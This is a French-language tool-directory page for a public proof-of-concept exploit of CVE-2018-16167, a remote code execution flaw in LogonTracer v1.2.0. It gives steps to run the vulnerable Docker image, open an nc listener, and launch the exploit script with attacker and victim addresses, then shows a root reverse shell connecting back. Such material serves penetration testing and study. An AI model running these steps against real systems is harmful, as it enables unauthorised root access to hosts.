Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-16167 — LogonTracer v1.2.0 RCE | Kitploit
Outils/GitHubGitHub/dnr6419/cve-2018-16167
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubdnr6419/cve-2018-16167

CVE-2018-16167

LogonTracer v1.2.0 RCE

Voir le dépôt
il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Ordre d'installation et d'exécution

0. Installation de LogonTracer

Téléchargez la version 1.2.0 de logontracer, dans laquelle une vulnérabilité a été découverte, depuis dockerhub.

root@kitploit:~
 $docker pull jpcertcc/docker-logontracer:v1.2.0 

1. Exécution de LogonTracer

Montez le conteneur avec la commande suivante :

root@kitploit:~
 $docker run \
   --detach \
   --publish=7474:7474 --publish=7687:7687 --publish=8080:8080 \
   -e LTHOSTNAME=[IP_ADDR] \
   jpcertcc/docker-logontracer:v1.2.0

2. nc sur l'hôte pour obtenir un shell

Ouvrez un port spécifique sur l'hôte pour obtenir un shell en utilisant nc.

root@kitploit:~
 
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp {attacker_port}
listening on [any] 8888 ...

3. Exécution du code d'attaque

Exécutez le code d'attaque.

root@kitploit:~
 
dnr6419@DESKTOP-4CJA7LD ~/docker/logon
☺  python3 go.py {attacker_ip} {attacker_port} http://{victime_ip}:8080

Résultat d'exécution

Comme le montre l'image ci-dessous, le code d'attaque s'exécute avec succès et vous obtenez un shell distant.

root@kitploit:~
PS C:\Users\0ppr2s\Desktop\main\nc> .\nc64.exe -lvp 8888
listening on [any] 8888 ...
192.168.56.103: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.103] 41858: NO_DATA
/usr/local/src/LogonTracer # ^[[16;30Rid
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/usr/local/src/LogonTracer # ^[[20;30R

image

Télécharger l’outil